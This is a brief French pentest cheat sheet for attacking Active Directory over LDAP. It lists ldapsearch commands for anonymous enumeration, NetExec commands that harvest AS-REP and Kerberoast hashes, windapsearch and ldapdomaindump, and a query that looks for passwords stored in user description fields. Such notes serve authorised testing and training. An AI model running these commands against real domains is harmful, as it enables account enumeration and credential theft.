sommaire
LDAP (389/636, GC 3268/3269) — Active Directory
Bind anonyme & contexte de nommage
ldapsearch -x -H ldap://10.10.10.10 -s base namingcontexts
ldapsearch -x -H ldap://10.10.10.10 -b '' -s base '(objectClass=*)'
Énumérer utilisateurs / groupes
ldapsearch -x -H ldap://10.10.10.10 -b 'DC=domaine,DC=local'
ldapsearch -x -H ldap://10.10.10.10 -b 'DC=domaine,DC=local' '(objectClass=user)' sAMAccountName
ldapsearch -x -H ldap://10.10.10.10 -b 'DC=domaine,DC=local' '(objectClass=group)' cn member
Avec des identifiants (outils dédiés)
nxc ldap 10.10.10.10 -u user -p pass
nxc ldap 10.10.10.10 -u user -p pass --asreproast asrep.txt --kerberoasting kerb.txt
windapsearch -d domaine.local --dc-ip 10.10.10.10 -u user@domaine.local -p pass -U
ldapdomaindump -u 'domaine.local\\user' -p pass 10.10.10.10 # dump HTML complet
Chercher des secrets (description, GPP)
ldapsearch -x -H ldap://10.10.10.10 -b 'DC=domaine,DC=local' '(objectClass=user)' description
# le champ 'description' contient parfois un mot de passe